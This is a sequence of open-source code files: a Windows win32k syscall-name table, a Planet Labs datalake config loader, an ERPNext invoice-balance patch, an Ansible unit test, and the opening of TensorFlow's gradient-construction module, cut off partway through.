'NtUserGetClassInfoEx', # 0x196
'NtUserGetClassName', # 0x197
'NtUserGetClipboardData', # 0x198
'NtUserGetClipboardFormatName', # 0x199
'NtUserGetClipboardOwner', # 0x19a
'NtUserGetClipboardSequenceNumber', # 0x19b
'NtUserGetClipboardViewer', # 0x19c
'NtUserGetClipCursor', # 0x19d
'NtUserGetComboBoxInfo', # 0x19e
'NtUserGetControlBrush', # 0x19f
'NtUserGetControlColor', # 0x1a0
'NtUserGetCPD', # 0x1a1
'NtUserGetCursorFrameInfo', # 0x1a2
'NtUserGetCursorInfo', # 0x1a3
'NtUserGetDC', # 0x1a4
'NtUserGetDCEx', # 0x1a5
'NtUserGetDoubleClickTime', # 0x1a6
'NtUserGetForegroundWindow', # 0x1a7
'NtUserGetGuiResources', # 0x1a8
'NtUserGetGUIThreadInfo', # 0x1a9
'NtUserGetIconInfo', # 0x1aa
'NtUserGetIconSize', # 0x1ab
'NtUserGetImeHotKey', # 0x1ac
'NtUserGetImeInfoEx', # 0x1ad
'NtUserGetInputLocaleInfo', # 0x1ae
'NtUserGetInternalWindowPos', # 0x1af
'NtUserGetKeyboardLayoutList', # 0x1b0
'NtUserGetKeyboardLayoutName', # 0x1b1
'NtUserGetKeyboardState', # 0x1b2
'NtUserGetKeyNameText', # 0x1b3
'NtUserGetKeyState', # 0x1b4
'NtUserGetListBoxInfo', # 0x1b5
'NtUserGetMenuBarInfo', # 0x1b6
'NtUserGetMenuIndex', # 0x1b7
'NtUserGetMenuItemRect', # 0x1b8
'NtUserGetMessage', # 0x1b9
'NtUserGetMouseMovePointsEx', # 0x1ba
'NtUserGetObjectInformation', # 0x1bb
'NtUserGetOpenClipboardWindow', # 0x1bc
'NtUserGetPriorityClipboardFormat', # 0x1bd
'NtUserGetProcessWindowStation', # 0x1be
'NtUserGetRawInputBuffer', # 0x1bf
'NtUserGetRawInputData', # 0x1c0
'NtUserGetRawInputDeviceInfo', # 0x1c1
'NtUserGetRawInputDeviceList', # 0x1c2
'NtUserGetRegisteredRawInputDevices', # 0x1c3
'NtUserGetScrollBarInfo', # 0x1c4
'NtUserGetSystemMenu', # 0x1c5
'NtUserGetThreadDesktop', # 0x1c6
'NtUserGetThreadState', # 0x1c7
'NtUserGetTitleBarInfo', # 0x1c8
'NtUserGetTopLevelWindow', # 0x1c9
'NtUserGetUpdatedClipboardFormats', # 0x1ca
'NtUserGetUpdateRect', # 0x1cb
'NtUserGetUpdateRgn', # 0x1cc
'NtUserGetWindowCompositionInfo', # 0x1cd
'NtUserGetWindowCompositionAttribute', # 0x1ce
'NtUserGetWindowDC', # 0x1cf
'NtUserGetWindowDisplayAffinity', # 0x1d0
'NtUserGetWindowPlacement', # 0x1d1
'NtUserGetWOWClass', # 0x1d2
'NtUserGhostWindowFromHungWindow', # 0x1d3
'NtUserHardErrorControl', # 0x1d4
'NtUserHideCaret', # 0x1d5
'NtUserHiliteMenuItem', # 0x1d6
'NtUserHungWindowFromGhostWindow', # 0x1d7
'NtUserImpersonateDdeClientWindow', # 0x1d8
'NtUserInitialize', # 0x1d9
'NtUserInitializeClientPfnArrays', # 0x1da
'NtUserInitTask', # 0x1db
'NtUserInternalGetWindowText', # 0x1dc
'NtUserInternalGetWindowIcon', # 0x1dd
'NtUserInvalidateRect', # 0x1de
'NtUserInvalidateRgn', # 0x1df
'NtUserIsClipboardFormatAvailable', # 0x1e0
'NtUserIsTopLevelWindow', # 0x1e1
'NtUserKillTimer', # 0x1e2
'NtUserLoadKeyboardLayoutEx', # 0x1e3
'NtUserLockWindowStation', # 0x1e4
'NtUserLockWindowUpdate', # 0x1e5
'NtUserLockWorkStation', # 0x1e6
'NtUserLogicalToPhysicalPoint', # 0x1e7
'NtUserMapVirtualKeyEx', # 0x1e8
'NtUserMenuItemFromPoint', # 0x1e9
'NtUserMessageCall', # 0x1ea
'NtUserMinMaximize', # 0x1eb
'NtUserMNDragLeave', # 0x1ec
'NtUserMNDragOver', # 0x1ed
'NtUserModifyUserStartupInfoFlags', # 0x1ee
'NtUserMoveWindow', # 0x1ef
'NtUserNotifyIMEStatus', # 0x1f0
'NtUserNotifyProcessCreate', # 0x1f1
'NtUserNotifyWinEvent', # 0x1f2
'NtUserOpenClipboard', # 0x1f3
'NtUserOpenDesktop', # 0x1f4
'NtUserOpenInputDesktop', # 0x1f5
'NtUserOpenThreadDesktop', # 0x1f6
'NtUserOpenWindowStation', # 0x1f7
'NtUserPaintDesktop', # 0x1f8
'NtUserPaintMonitor', # 0x1f9
'NtUserPeekMessage', # 0x1fa
'NtUserPhysicalToLogicalPoint', # 0x1fb
'NtUserPostMessage', # 0x1fc
'NtUserPostThreadMessage', # 0x1fd
'NtUserPrintWindow', # 0x1fe
'NtUserProcessConnect', # 0x1ff
'NtUserQueryInformationThread', # 0x200
'NtUserQueryInputContext', # 0x201
'NtUserQuerySendMessage', # 0x202
'NtUserQueryWindow', # 0x203
'NtUserRealChildWindowFromPoint', # 0x204
'NtUserRealInternalGetMessage', # 0x205
'NtUserRealWaitMessageEx', # 0x206
'NtUserRedrawWindow', # 0x207
'NtUserRegisterClassExWOW', # 0x208
'NtUserRegisterErrorReportingDialog', # 0x209
'NtUserRegisterUserApiHook', # 0x20a
'NtUserRegisterHotKey', # 0x20b
'NtUserRegisterRawInputDevices', # 0x20c
'NtUserRegisterServicesProcess', # 0x20d
'NtUserRegisterTasklist', # 0x20e
'NtUserRegisterWindowMessage', # 0x20f
'NtUserRemoveClipboardFormatListener', # 0x210
'NtUserRemoveMenu', # 0x211
'NtUserRemoveProp', # 0x212
'NtUserResolveDesktopForWOW', # 0x213
'NtUserSBGetParms', # 0x214
'NtUserScrollDC', # 0x215
'NtUserScrollWindowEx', # 0x216
'NtUserSelectPalette', # 0x217
'NtUserSendInput', # 0x218
'NtUserSetActiveWindow', # 0x219
'NtUserSetAppImeLevel', # 0x21a
'NtUserSetCapture', # 0x21b
'NtUserSetChildWindowNoActivate', # 0x21c
'NtUserSetClassLong', # 0x21d
'NtUserSetClassWord', # 0x21e
'NtUserSetClipboardData', # 0x21f
'NtUserSetClipboardViewer', # 0x220
'NtUserSetCursor', # 0x221
'NtUserSetCursorContents', # 0x222
'NtUserSetCursorIconData', # 0x223
'NtUserSetFocus', # 0x224
'NtUserSetImeHotKey', # 0x225
'NtUserSetImeInfoEx', # 0x226
'NtUserSetImeOwnerWindow', # 0x227
'NtUserSetInformationThread', # 0x228
'NtUserSetInternalWindowPos', # 0x229
'NtUserSetKeyboardState', # 0x22a
'NtUserSetMenu', # 0x22b
'NtUserSetMenuContextHelpId', # 0x22c
'NtUserSetMenuDefaultItem', # 0x22d
'NtUserSetMenuFlagRtoL', # 0x22e
'NtUserSetObjectInformation', # 0x22f
'NtUserSetParent', # 0x230
'NtUserSetProcessWindowStation', # 0x231
'NtUserGetProp', # 0x232
'NtUserSetProp', # 0x233
'NtUserSetScrollInfo', # 0x234
'NtUserSetShellWindowEx', # 0x235
'NtUserSetSysColors', # 0x236
'NtUserSetSystemCursor', # 0x237
'NtUserSetSystemMenu', # 0x238
'NtUserSetSystemTimer', # 0x239
'NtUserSetThreadDesktop', # 0x23a
'NtUserSetThreadLayoutHandles', # 0x23b
'NtUserSetThreadState', # 0x23c
'NtUserSetTimer', # 0x23d
'NtUserSetProcessDPIAware', # 0x23e
'NtUserSetWindowCompositionAttribute', # 0x23f
'NtUserSetWindowDisplayAffinity', # 0x240
'NtUserSetWindowFNID', # 0x241
'NtUserSetWindowLong', # 0x242
'NtUserSetWindowPlacement', # 0x243
'NtUserSetWindowPos', # 0x244
'NtUserSetWindowRgn', # 0x245
'NtUserGetWindowRgnEx', # 0x246
'NtUserSetWindowRgnEx', # 0x247
'NtUserSetWindowsHookAW', # 0x248
'NtUserSetWindowsHookEx', # 0x249
'NtUserSetWindowStationUser', # 0x24a
'NtUserSetWindowWord', # 0x24b
'NtUserSetWinEventHook', # 0x24c
'NtUserShowCaret', # 0x24d
'NtUserShowScrollBar', # 0x24e
'NtUserShowWindow', # 0x24f
'NtUserShowWindowAsync', # 0x250
'NtUserSoundSentry', # 0x251
'NtUserSwitchDesktop', # 0x252
'NtUserSystemParametersInfo', # 0x253
'NtUserTestForInteractiveUser', # 0x254
'NtUserThunkedMenuInfo', # 0x255
'NtUserThunkedMenuItemInfo', # 0x256
'NtUserToUnicodeEx', # 0x257
'NtUserTrackMouseEvent', # 0x258
'NtUserTrackPopupMenuEx', # 0x259
'NtUserCalculatePopupWindowPosition', # 0x25a
'NtUserCalcMenuBar', # 0x25b
'NtUserPaintMenuBar', # 0x25c
'NtUserTranslateAccelerator', # 0x25d
'NtUserTranslateMessage', # 0x25e
'NtUserUnhookWindowsHookEx', # 0x25f
'NtUserUnhookWinEvent', # 0x260
'NtUserUnloadKeyboardLayout', # 0x261
'NtUserUnlockWindowStation', # 0x262
'NtUserUnregisterClass', # 0x263
'NtUserUnregisterUserApiHook', # 0x264
'NtUserUnregisterHotKey', # 0x265
'NtUserUpdateInputContext', # 0x266
'NtUserUpdateInstance', # 0x267
'NtUserUpdateLayeredWindow', # 0x268
'NtUserGetLayeredWindowAttributes', # 0x269
'NtUserSetLayeredWindowAttributes', # 0x26a
'NtUserUpdatePerUserSystemParameters', # 0x26b
'NtUserUserHandleGrantAccess', # 0x26c
'NtUserValidateHandleSecure', # 0x26d
'NtUserValidateRect', # 0x26e
'NtUserValidateTimerCallback', # 0x26f
'NtUserVkKeyScanEx', # 0x270
'NtUserWaitForInputIdle', # 0x271
'NtUserWaitForMsgAndEvent', # 0x272
'NtUserWaitMessage', # 0x273
'NtUserWindowFromPhysicalPoint', # 0x274
'NtUserWindowFromPoint', # 0x275
'NtUserYieldTask', # 0x276
'NtUserRemoteConnect', # 0x277
'NtUserRemoteRedrawRectangle', # 0x278
'NtUserRemoteRedrawScreen', # 0x279
'NtUserRemoteStopScreenUpdates', # 0x27a
'NtUserCtxDisplayIOCtl', # 0x27b
'NtUserRegisterSessionPort', # 0x27c
'NtUserUnregisterSessionPort', # 0x27d
'NtUserUpdateWindowTransform', # 0x27e
'NtUserDwmStartRedirection', # 0x27f
'NtUserDwmStopRedirection', # 0x280
'NtUserGetWindowMinimizeRect', # 0x281
'NtUserSfmDxBindSwapChain', # 0x282
'NtUserSfmDxOpenSwapChain', # 0x283
'NtUserSfmDxReleaseSwapChain', # 0x284
'NtUserSfmDxSetSwapChainBindingStatus', # 0x285
'NtUserSfmDxQuerySwapChainBindingStatus', # 0x286
'NtUserSfmDxReportPendingBindingsToDwm', # 0x287
'NtUserSfmDxGetSwapChainStats', # 0x288
'NtUserSfmDxSetSwapChainStats', # 0x289
'NtUserSfmGetLogicalSurfaceBinding', # 0x28a
'NtUserSfmDestroyLogicalSurfaceBinding', # 0x28b
'NtUserModifyWindowTouchCapability', # 0x28c
'NtUserIsTouchWindow', # 0x28d
'NtUserSendTouchInput', # 0x28e
'NtUserEndTouchOperation', # 0x28f
'NtUserGetTouchInputInfo', # 0x290
'NtUserChangeWindowMessageFilterEx', # 0x291
'NtUserInjectGesture', # 0x292
'NtUserGetGestureInfo', # 0x293
'NtUserGetGestureExtArgs', # 0x294
'NtUserManageGestureHandlerWindow', # 0x295
'NtUserSetGestureConfig', # 0x296
'NtUserGetGestureConfig', # 0x297
'NtGdiEngAssociateSurface', # 0x298
'NtGdiEngCreateBitmap', # 0x299
'NtGdiEngCreateDeviceSurface', # 0x29a
'NtGdiEngCreateDeviceBitmap', # 0x29b
'NtGdiEngCreatePalette', # 0x29c
'NtGdiEngComputeGlyphSet', # 0x29d
'NtGdiEngCopyBits', # 0x29e
'NtGdiEngDeletePalette', # 0x29f
'NtGdiEngDeleteSurface', # 0x2a0
'NtGdiEngEraseSurface', # 0x2a1
'NtGdiEngUnlockSurface', # 0x2a2
'NtGdiEngLockSurface', # 0x2a3
'NtGdiEngBitBlt', # 0x2a4
'NtGdiEngStretchBlt', # 0x2a5
'NtGdiEngPlgBlt', # 0x2a6
'NtGdiEngMarkBandingSurface', # 0x2a7
'NtGdiEngStrokePath', # 0x2a8
'NtGdiEngFillPath', # 0x2a9
'NtGdiEngStrokeAndFillPath', # 0x2aa
'NtGdiEngPaint', # 0x2ab
'NtGdiEngLineTo', # 0x2ac
'NtGdiEngAlphaBlend', # 0x2ad
'NtGdiEngGradientFill', # 0x2ae
'NtGdiEngTransparentBlt', # 0x2af
'NtGdiEngTextOut', # 0x2b0
'NtGdiEngStretchBltROP', # 0x2b1
'NtGdiXLATEOBJ_cGetPalette', # 0x2b2
'NtGdiXLATEOBJ_iXlate', # 0x2b3
'NtGdiXLATEOBJ_hGetColorTransform', # 0x2b4
'NtGdiCLIPOBJ_bEnum', # 0x2b5
'NtGdiCLIPOBJ_cEnumStart', # 0x2b6
'NtGdiCLIPOBJ_ppoGetPath', # 0x2b7
'NtGdiEngDeletePath', # 0x2b8
'NtGdiEngCreateClip', # 0x2b9
'NtGdiEngDeleteClip', # 0x2ba
'NtGdiBRUSHOBJ_ulGetBrushColor', # 0x2bb
'NtGdiBRUSHOBJ_pvAllocRbrush', # 0x2bc
'NtGdiBRUSHOBJ_pvGetRbrush', # 0x2bd
'NtGdiBRUSHOBJ_hGetColorTransform', # 0x2be
'NtGdiXFORMOBJ_bApplyXform', # 0x2bf
'NtGdiXFORMOBJ_iGetXform', # 0x2c0
'NtGdiFONTOBJ_vGetInfo', # 0x2c1
'NtGdiFONTOBJ_pxoGetXform', # 0x2c2
'NtGdiFONTOBJ_cGetGlyphs', # 0x2c3
'NtGdiFONTOBJ_pifi', # 0x2c4
'NtGdiFONTOBJ_pfdg', # 0x2c5
'NtGdiFONTOBJ_pQueryGlyphAttrs', # 0x2c6
'NtGdiFONTOBJ_pvTrueTypeFontFile', # 0x2c7
'NtGdiFONTOBJ_cGetAllGlyphHandles', # 0x2c8
'NtGdiSTROBJ_bEnum', # 0x2c9
'NtGdiSTROBJ_bEnumPositionsOnly', # 0x2ca
'NtGdiSTROBJ_bGetAdvanceWidths', # 0x2cb
'NtGdiSTROBJ_vEnumStart', # 0x2cc
'NtGdiSTROBJ_dwGetCodePage', # 0x2cd
'NtGdiPATHOBJ_vGetBounds', # 0x2ce
'NtGdiPATHOBJ_bEnum', # 0x2cf
'NtGdiPATHOBJ_vEnumStart', # 0x2d0
'NtGdiPATHOBJ_vEnumStartClipLines', # 0x2d1
'NtGdiPATHOBJ_bEnumClipLines', # 0x2d2
'NtGdiGetDhpdev', # 0x2d3
'NtGdiEngCheckAbort', # 0x2d4
'NtGdiHT_Get8BPPFormatPalette', # 0x2d5
'NtGdiHT_Get8BPPMaskPalette', # 0x2d6
'NtGdiUpdateTransform', # 0x2d7
'NtGdiSetPUMPDOBJ', # 0x2d8
'NtGdiBRUSHOBJ_DeleteRbrush', # 0x2d9
'NtGdiUMPDEngFreeUserMem', # 0x2da
'NtGdiDrawStream', # 0x2db
'NtGdiSfmGetNotificationTokens', # 0x2dc
'NtGdiHLSurfGetInformation', # 0x2dd
'NtGdiHLSurfSetInformation', # 0x2de
'NtGdiDdDDICreateAllocation', # 0x2df
'NtGdiDdDDIQueryResourceInfo', # 0x2e0
'NtGdiDdDDIOpenResource', # 0x2e1
'NtGdiDdDDIDestroyAllocation', # 0x2e2
'NtGdiDdDDISetAllocationPriority', # 0x2e3
'NtGdiDdDDIQueryAllocationResidency', # 0x2e4
'NtGdiDdDDICreateDevice', # 0x2e5
'NtGdiDdDDIDestroyDevice', # 0x2e6
'NtGdiDdDDICreateContext', # 0x2e7
'NtGdiDdDDIDestroyContext', # 0x2e8
'NtGdiDdDDICreateSynchronizationObject', # 0x2e9
'NtGdiDdDDIOpenSynchronizationObject', # 0x2ea
'NtGdiDdDDIDestroySynchronizationObject', # 0x2eb
'NtGdiDdDDIWaitForSynchronizationObject', # 0x2ec
'NtGdiDdDDISignalSynchronizationObject', # 0x2ed
'NtGdiDdDDIGetRuntimeData', # 0x2ee
'NtGdiDdDDIQueryAdapterInfo', # 0x2ef
'NtGdiDdDDILock', # 0x2f0
'NtGdiDdDDIUnlock', # 0x2f1
'NtGdiDdDDIGetDisplayModeList', # 0x2f2
'NtGdiDdDDISetDisplayMode', # 0x2f3
'NtGdiDdDDIGetMultisampleMethodList', # 0x2f4
'NtGdiDdDDIPresent', # 0x2f5
'NtGdiDdDDIRender', # 0x2f6
'NtGdiDdDDIOpenAdapterFromDeviceName', # 0x2f7
'NtGdiDdDDIOpenAdapterFromHdc', # 0x2f8
'NtGdiDdDDICloseAdapter', # 0x2f9
'NtGdiDdDDIGetSharedPrimaryHandle', # 0x2fa
'NtGdiDdDDIEscape', # 0x2fb
'NtGdiDdDDIQueryStatistics', # 0x2fc
'NtGdiDdDDISetVidPnSourceOwner', # 0x2fd
'NtGdiDdDDIGetPresentHistory', # 0x2fe
'NtGdiDdDDIGetPresentQueueEvent', # 0x2ff
'NtGdiDdDDICreateOverlay', # 0x300
'NtGdiDdDDIUpdateOverlay', # 0x301
'NtGdiDdDDIFlipOverlay', # 0x302
'NtGdiDdDDIDestroyOverlay', # 0x303
'NtGdiDdDDIWaitForVerticalBlankEvent', # 0x304
'NtGdiDdDDISetGammaRamp', # 0x305
'NtGdiDdDDIGetDeviceState', # 0x306
'NtGdiDdDDICreateDCFromMemory', # 0x307
'NtGdiDdDDIDestroyDCFromMemory', # 0x308
'NtGdiDdDDISetContextSchedulingPriority', # 0x309
'NtGdiDdDDIGetContextSchedulingPriority', # 0x30a
'NtGdiDdDDISetProcessSchedulingPriorityClass', # 0x30b
'NtGdiDdDDIGetProcessSchedulingPriorityClass', # 0x30c
'NtGdiDdDDIReleaseProcessVidPnSourceOwners', # 0x30d
'NtGdiDdDDIGetScanLine', # 0x30e
'NtGdiDdDDISetQueuedLimit', # 0x30f
'NtGdiDdDDIPollDisplayChildren', # 0x310
'NtGdiDdDDIInvalidateActiveVidPn', # 0x311
'NtGdiDdDDICheckOcclusion', # 0x312
'NtGdiDdDDIWaitForIdle', # 0x313
'NtGdiDdDDICheckMonitorPowerState', # 0x314
'NtGdiDdDDICheckExclusiveOwnership', # 0x315
'NtGdiDdDDISetDisplayPrivateDriverFormat', # 0x316
'NtGdiDdDDISharedPrimaryLockNotification', # 0x317
'NtGdiDdDDISharedPrimaryUnLockNotification', # 0x318
'NtGdiDdDDICreateKeyedMutex', # 0x319
'NtGdiDdDDIOpenKeyedMutex', # 0x31a
'NtGdiDdDDIDestroyKeyedMutex', # 0x31b
'NtGdiDdDDIAcquireKeyedMutex', # 0x31c
'NtGdiDdDDIReleaseKeyedMutex', # 0x31d
'NtGdiDdDDIConfigureSharedResource', # 0x31e
'NtGdiDdDDIGetOverlayState', # 0x31f
'NtGdiDdDDICheckVidPnExclusiveOwnership', # 0x320
'NtGdiDdDDICheckSharedResourceAccess', # 0x321
'DxgStubEnableDirectDrawRedirection', # 0x322
'DxgStubDeleteDirectDrawObject', # 0x323
'NtGdiGetNumberOfPhysicalMonitors', # 0x324
'NtGdiGetPhysicalMonitors', # 0x325
'NtGdiGetPhysicalMonitorDescription', # 0x326
'NtGdiDestroyPhysicalMonitor', # 0x327
'NtGdiDDCCIGetVCPFeature', # 0x328
'NtGdiDDCCISetVCPFeature', # 0x329
'NtGdiDDCCISaveCurrentSettings', # 0x32a
'NtGdiDDCCIGetCapabilitiesStringLength', # 0x32b
'NtGdiDDCCIGetCapabilitiesString', # 0x32c
'NtGdiDDCCIGetTimingReport', # 0x32d
'NtGdiDdCreateFullscreenSprite', # 0x32e
'NtGdiDdNotifyFullscreenSpriteUpdate', # 0x32f
'NtGdiDdDestroyFullscreenSprite', # 0x330
'NtGdiDdQueryVisRgnUniqueness', # 0x331
'NtUserSetMirrorRendering', # 0x332
'NtUserShowSystemCursor', # 0x333
'NtUserMagControl', # 0x334
'NtUserMagSetContextInformation', # 0x335
'NtUserMagGetContextInformation', # 0x336
'NtUserHwndQueryRedirectionInfo', # 0x337
'NtUserHwndSetRedirectionInfo', # 0x338
],
]
| gpl-2.0 |
planetlabs/datalake-common | datalake_common/conf.py | 2 | 2968 | # Copyright 2015 Planet Labs, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
from six import iteritems
from dotenv import load_dotenv
import os
from .errors import InsufficientConfiguration
def load_config(config_file, default_config_file, **kwargs):
'''load the configuration
Configuration variables are delivered to applications exclusively through
the environment. They get into the environment either from a specified
configuration file, from a default configuration file, from an environment
variable, or from a kwarg specified to this function.
Configuration variables are applied with the following precedence (lowest
to highest):
- config file: the format of the config file is a typical environment file
with individual lines like DATALAKE_FOO=bar. By convention, all variables
start with either DATALAKE_ or AWS_.
- environment variables: The variable names are the same as what would be
written in a config file.
- kwargs: additional configuration variables to apply, subject to some
conventions. Specifically, kwargs are lowercase. A kwarg called `foo`
maps to a configuration variable called `DATALAKE_FOO`. The only
exception to this is a kwarg that starts with `aws_`. That is, a kwarg
called `aws_baz` would map to a configuration variable called `AWS_BAZ`.
Args:
- config_file: the configuration file to load. If it is None,
default_config_file will be examined. If it is not None and does not
exist an InsufficientConfiguration exception is thrown.
- default_config_file: the file to try if config_file is None. If
default_config_file is None or does not exist, it is simply ignored. No
exceptions are thrown.
- kwargs: key=value pairs.
'''
if config_file and not os.path.exists(config_file):
msg = 'config file {} does not exist'.format(config_file)
raise InsufficientConfiguration(msg)
if config_file is None and \
default_config_file is not None and \
os.path.exists(default_config_file):
config_file = default_config_file
if config_file is not None:
load_dotenv(config_file)
_update_environment(**kwargs)
def _update_environment(**kwargs):
for k, v in iteritems(kwargs):
if v is None:
continue
if not k.startswith('aws_'):
k = 'DATALAKE_' + k
k = k.upper()
os.environ[k] = v
| apache-2.0 |
gangadhar-kadam/mtn-erpnext | patches/february_2013/fix_outstanding.py | 6 | 1037 | def execute():
import webnotes
from webnotes.utils import flt
records = webnotes.conn.sql("""
select against_voucher_type, against_voucher,
sum(ifnull(debit, 0)) - sum(ifnull(credit, 0)) as outstanding from `tabGL Entry`
where ifnull(is_cancelled, 'No') = 'No'
and against_voucher_type in ("Sales Invoice", "Purchase Invoice")
and ifnull(against_voucher, '') != ''
group by against_voucher_type, against_voucher""", as_dict=1)
for r in records:
outstanding = webnotes.conn.sql("""select name, outstanding_amount from `tab%s`
where name = %s and docstatus = 1""" %
(r["against_voucher_type"], '%s'), (r["against_voucher"]))
if outstanding and abs(flt(r["outstanding"])) != flt(outstanding[0][1]):
if ((r["against_voucher_type"]=='Sales Invoice' and flt(r["outstanding"]) >= 0) \
or (r["against_voucher_type"]=="Purchase Invoice" and flt(["outstanding"]) <= 0)):
webnotes.conn.set_value(r["against_voucher_type"], r["against_voucher"],
"outstanding_amount", abs(flt(r["outstanding"]))) | agpl-3.0 |
agaffney/ansible | test/units/executor/module_common/test_modify_module.py | 84 | 1383 | # Copyright (c) 2018 Matt Martz <matt@sivel.net>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# -*- coding: utf-8 -*-
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import pytest
from ansible.executor.module_common import modify_module
from ansible.module_utils.six import PY2
from test_module_common import templar
FAKE_OLD_MODULE = b'''#!/usr/bin/python
import sys
print('{"result": "%s"}' % sys.executable)
'''
@pytest.fixture
def fake_old_module_open(mocker):
m = mocker.mock_open(read_data=FAKE_OLD_MODULE)
if PY2:
mocker.patch('__builtin__.open', m)
else:
mocker.patch('builtins.open', m)
# this test no longer makes sense, since a Python module will always either have interpreter discovery run or
# an explicit interpreter passed (so we'll never default to the module shebang)
# def test_shebang(fake_old_module_open, templar):
# (data, style, shebang) = modify_module('fake_module', 'fake_path', {}, templar)
# assert shebang == '#!/usr/bin/python'
def test_shebang_task_vars(fake_old_module_open, templar):
task_vars = {
'ansible_python_interpreter': '/usr/bin/python3'
}
(data, style, shebang) = modify_module('fake_module', 'fake_path', {}, templar, task_vars=task_vars)
assert shebang == '#!/usr/bin/python3'
| gpl-3.0 |
MehdiSfr/tensor-flow | tensorflow/python/ops/gradients.py | 1 | 25465 | # Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Implements the graph generation for computation of gradients."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import warnings
import tensorflow.python.platform
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
# pylint: disable=unused-import
from tensorflow.python.ops import array_grad
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import constant_op
from tensorflow.python.ops import control_flow_grad
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import image_grad
from tensorflow.python.ops import logging_ops
from tensorflow.python.ops import linalg_grad
from tensorflow.python.ops import math_grad
# pylint: enable=unused-import
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import linalg_ops
from tensorflow.python.platform import logging
# Warn the user if we convert a sparse representation to dense with at
# least this number of elements.
_LARGE_SPARSE_NUM_ELEMENTS = 100000000
def _IndexedSlicesToTensor(value, dtype=None, name=None):
"""Converts an IndexedSlices object `value` to a Tensor.
NOTE(mrry): This function is potentially expensive.
Args:
value: An ops.IndexedSlices object.
dtype: The dtype of the Tensor to be returned.
name: Optional name to use for the returned Tensor.
Returns:
A dense Tensor representing the values in the given IndexedSlices.
Raises:
ValueError: If the IndexedSlices does not have the same dtype.
"""
if dtype and not dtype.is_compatible_with(value.dtype):
raise ValueError(
"Tensor conversion requested dtype %s for IndexedSlices with dtype %s" %
(dtype.name, value.dtype.name))
if value.dense_shape is None:
raise ValueError(
"Tensor conversion requested for IndexedSlices without dense_shape: %s"
% str(value))
# TODO(mrry): Consider adding static shape information to
# IndexedSlices, to avoid using numpy here.
dense_shape_value = tensor_util.ConstantValue(value.dense_shape)
if dense_shape_value is not None:
num_elements = np.prod(dense_shape_value)
if num_elements >= _LARGE_SPARSE_NUM_ELEMENTS:
warnings.warn(
"Converting sparse IndexedSlices to a dense Tensor with %d elements. "
"This may consume a large amount of memory." % num_elements)
else:
warnings.warn(
"Converting sparse IndexedSlices to a dense Tensor of unknown shape. "
"This may consume a large amount of memory.")
return math_ops.unsorted_segment_sum(value.values,
value.indices,
value.dense_shape[0],
name=name)
ops.register_tensor_conversion_function(ops.IndexedSlices,
_IndexedSlicesToTensor)
def _MarkReachedOps(from_ops, reached_ops):
"""Mark all ops reached from "from_ops".
Args:
from_ops: list of Operations.
reached_ops: list of booleans, indexed by operation id.
"""
queue = collections.deque()
queue.extend(from_ops)
while queue:
op = queue.popleft()
if not reached_ops[op._id]:
reached_ops[op._id] = True
for output in op.outputs:
queue.extend(output.consumers())
def _GatherInputs(to_ops, reached_ops):
"""List all inputs of to_ops that are in reached_ops.
Args:
to_ops: list of Operations.
reached_ops: list of booleans, indexed by operation id.
Returns:
The list of all inputs of to_ops that are in reached_ops.
That list includes all elements of to_ops.
"""
inputs = []
queue = collections.deque()
queue.extend(to_ops)
while queue:
op = queue.popleft()
# We are interested in this op.
if reached_ops[op._id]:
inputs.append(op)
# Clear the boolean so we won't add the inputs again.
reached_ops[op._id] = False
for inp in op.inputs:
queue.append(inp.op)
return inputs
def _GetGradsDevice(op, colocate_gradients_with_ops):
"""Gets the device to which to assign gradients of "op".
Args:
op: an Operation.
colocate_gradients_with_ops: If True, try colocating gradients with the
corresponding op.
Returns:
A device string.
"""
if colocate_gradients_with_ops and op.device:
return op.device
else:
return op.graph.get_default_device()
def _PendingCount(graph, to_ops, from_ops):
"""Initialize the pending count for ops between two lists of Operations.
'pending_count[op._id]' indicates the number of backprop inputs
to this operation.
Args:
graph: a Graph.
to_ops: list of Operations.
from_ops: list of Operations.
Returns:
A tuple containing: (1) a list of integers indexed by operation id,
indicating the number of backprop inputs to this operation, and (2)
a boolean which is True if any of the ops in between from_ops and to_ops
contain control flow loops.
"""
# Mark reachable ops from from_ops.
reached_ops = [False] * (graph._last_id + 1)
for op in to_ops:
reached_ops[op._id] = True
_MarkReachedOps(from_ops, reached_ops)
# Mark between ops.
between_ops = [False] * (graph._last_id + 1)
between_op_list = []
queue = collections.deque()
queue.extend(to_ops)
while queue:
op = queue.popleft()
# We are interested in this op.
if reached_ops[op._id]:
between_ops[op._id] = True
between_op_list.append(op)
# Clear the boolean so we won't add the inputs again.
reached_ops[op._id] = False
for inp in op.inputs:
queue.append(inp.op)
# Initialize pending count for between ops.
pending_count = [0] * (graph._last_id + 1)
has_control_flow = False
for op in between_op_list:
for x in op.inputs:
if between_ops[x.op._id]:
pending_count[x.op._id] += 1
for x in op.control_inputs:
if between_ops[x._id]:
pending_count[x._id] += 1
if op.type == "Exit":
has_control_flow = True
return pending_count, has_control_flow
def _AsList(x):
return x if isinstance(x, (list, tuple)) else [x]
def _DefaultGradYs(grad_ys, ys, colocate_gradients_with_ops):
"""Fill in default values for grad_ys.
Args:
grad_ys: List of gradients, can contain None.
ys: List of tensors.
colocate_gradients_with_ops: If True, try colocating gradients with
the corresponding op.
Returns:
A list of gradients to use, without None.
